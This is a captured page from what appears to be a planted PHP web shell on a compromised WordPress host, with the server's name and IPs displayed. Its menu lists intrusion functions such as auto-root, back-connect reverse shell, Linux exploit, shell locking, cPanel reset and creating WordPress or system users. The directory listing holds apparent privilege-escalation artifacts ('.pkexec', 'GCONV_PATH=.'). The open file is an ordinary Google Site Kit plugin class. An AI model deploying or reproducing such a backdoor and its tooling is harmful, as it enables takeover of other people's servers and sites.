Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.147.68.138
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Modules /
Analytics_4 /
Conversion_Reporting /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Conversion_Reporting_Cron.php
1.31
KB
-rw-r--r--
Conversion_Reporting_Events_Sy...
4.14
KB
-rw-r--r--
Conversion_Reporting_Provider....
2.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Conversion_Reporting_Provider.php
<?php /** * Class Google\Site_Kit\Modules\Analytics_4\Conversion_Reporting\Conversion_Reporting_Provider * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Modules\Analytics_4\Conversion_Reporting; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Modules\Analytics_4; use Google\Site_Kit\Modules\Analytics_4\Settings; /** * Class providing the integration of conversion reporting. * * @since 1.135.0 * @access private * @ignore */ class Conversion_Reporting_Provider { /** * User_Options instance. * * @var User_Options */ private $user_options; /** * Analytics_4 instance. * * @var Analytics_4 */ private $analytics; /** * Conversion_Reporting_Cron instance. * * @var Conversion_Reporting_Cron */ private Conversion_Reporting_Cron $cron; /** * Conversion_Reporting_Events_Sync instance. * * @var Conversion_Reporting_Events_Sync */ private Conversion_Reporting_Events_Sync $events_sync; /** * Constructor. * * @since 1.135.0 * @since 1.139.0 Added Context to constructor. * * @param Context $context Plugin context. * @param Settings $settings Settings instance. * @param User_Options $user_options User_Options instance. * @param Analytics_4 $analytics analytics_4 instance. */ public function __construct( Context $context, Settings $settings, User_Options $user_options, Analytics_4 $analytics ) { $this->user_options = $user_options; $this->analytics = $analytics; $this->events_sync = new Conversion_Reporting_Events_Sync( $context, $settings, $this->analytics ); $this->cron = new Conversion_Reporting_Cron( fn() => $this->cron_callback() ); } /** * Registers functionality through WordPress hooks. * * @since 1.135.0 */ public function register() { $this->cron->register(); add_action( 'load-toplevel_page_googlesitekit-dashboard', fn () => $this->on_dashboard_load() ); } /** * Handles the googlesitekit-dashboard page load callback. * * @since 1.135.0 */ protected function on_dashboard_load() { $this->cron->maybe_schedule_cron(); } /** * Handles the cron callback. * * @since 1.135.0 */ protected function cron_callback() { $owner_id = $this->analytics->get_owner_id(); $restore_user = $this->user_options->switch_user( $owner_id ); $this->events_sync->sync_detected_events(); $restore_user(); } }
Close